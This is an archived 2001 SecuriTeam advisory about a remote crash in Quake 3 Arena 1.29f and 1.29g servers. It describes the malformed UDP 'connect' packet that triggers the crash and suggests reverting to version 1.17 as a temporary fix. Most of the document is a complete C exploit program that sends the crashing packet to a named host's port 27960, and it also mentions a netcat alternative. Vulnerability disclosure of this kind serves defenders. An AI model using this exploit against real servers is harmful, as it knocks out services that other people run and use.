[EXPL] Quake 3 Arena Security Vulnerability (CHAR 255, Exploit)

From: support@securiteam.com
Date: 08/02/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [EXPL] Quake 3 Arena Security Vulnerability (CHAR 255, Exploit)
Message-Id: <20010802192836.73E2A13902@mail.der-keiler.de>
Date: Thu,  2 Aug 2001 21:28:36 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Quake 3 Arena Security Vulnerability (CHAR 255, Exploit)
------------------------------------------------------------------------

SUMMARY

Quake 3 Arena allows gamers among to fight each others in virtual arenas
created for the Quake game. This application contains a vulnerability that
allows attackers to crash the server remotely.

DETAILS

Vulnerable systems:
Quake 3 Arena version 1.29f
Quake 3 Arena version 1.29g

Immune systems:
Quake 3 Arena version 1.17

A security vulnerability has been found in Quake 3 Arena. The
vulnerability allows an attacker to cause the server to crash.

The vulnerability can be reproduced by initiating a connection to the
server and then sending the following sequence:

????connectre

Where those four strange character (Y with the dots on them) are
char(255)'s.

Temporary solution:
A quick way to ensure that your server will be up is to revert back to
version 1.17.

Exploit:
/* This is a 1.29f and 1.29g Server Exploit for id software's Quake3:
Arena.
Basically this connects to the default port 27960 of a server and sends a
udp
packet with a string of Char(255) four times plus connect, all as one
word.
This is a working Linux version, simple enough to use: ./fuq3 <hostname>
I am no way going to continue to work on this it works it has done. It is
proven.
Therefore, here is the bare minimum. Thanks to ttol and his information,
this was achieved. There is also a working hack that can be done with
netcat, you use netcat
with the -u (UDP option) connect to the host, and then you send the
string.
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>

#define PORTNUMBER 27960 /* change this value to the port desired */

main (argc, argv)
int argc;
char *argv[];
{
    int socketDesc;
    struct sockaddr_in destinationAddr;
    struct hostent *hostAddrPtr;
    char *msgBufPtr = "????connectre";

    if ((socketDesc = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
        perror("open error on socket");
        exit(1);
    }

    if ((hostAddrPtr = gethostbyname(argv[1])) == 0) {
        printf("Could not get address of %s\n",argv[1]);
        exit(1);
    }

    destinationAddr.sin_family = AF_INET;
    memcpy((char *) &destinationAddr.sin_addr.s_addr,
           (char *) hostAddrPtr->h_addr, hostAddrPtr-> h_length);
    destinationAddr.sin_port = htons(PORTNUMBER);

    /* send message to socket */
    if (sendto(socketDesc, msgBufPtr, strlen(msgBufPtr)+1, 0,
           (struct sockaddr *)&destinationAddr, sizeof(destinationAddr))
0) {
        perror("socket send error");
        exit(1);
    }

    printf("Seg Fault on %s...\n",argv[1]);
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:drttol@hotmail.com> The Tree
of Life and <mailto:defrag@nyct.net> defrag.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages